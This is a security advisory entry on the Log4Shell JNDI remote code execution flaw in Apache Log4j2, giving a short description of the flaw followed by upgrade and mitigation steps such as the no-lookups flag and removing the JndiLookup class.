Apache Log4j2 JNDI Remote Code Execution
Description
Apache Log4j2 versions 2.0 through 2.14.1 contain a critical remote code execution vulnerability in their JNDI (Java Naming and Directory Interface) lookup feature. This widely-used Java logging library allows attackers to exploit its message lookup substitution functionality by injecting malicious JNDI references into log messages. When the library processes these specially crafted strings, it can be tricked into retrieving and executing arbitrary code from attacker-controlled LDAP or other JNDI servers. This vulnerability, known as Log4Shell (CVE-2021-44228), affects countless applications worldwide that use Log4j2 for logging operations.
Remediation
Immediately upgrade to Apache Log4j2 version 2.17.0 or later (2.12.4 for Java 7, 2.3.2 for Java 6), which completely removes support for message lookup patterns and disables JNDI functionality by default.
For systems that cannot be immediately upgraded:
1. For Log4j2 versions 2.10.0 through 2.14.1: Set the system property log4j2.formatMsgNoLookups to true by adding the following JVM argument:
-Dlog4j2.formatMsgNoLookups=true
2. Alternative mitigation: Remove the JndiLookup class from the log4j-core JAR file:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
3. Environment variable option: Set the environment variable:
LOG4J_FORMAT_MSG_NO_LOOKUPS=true
Additional protection: Ensure Java 8u121 or later is installed, which defaults com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false, providing defense-in-depth against RCE exploitation.
Note: Versions 2.15.0 and 2.16.0 contain incomplete fixes and should not be used. Verify all dependencies and transitive dependencies are updated, as Log4j2 is commonly included indirectly through other libraries.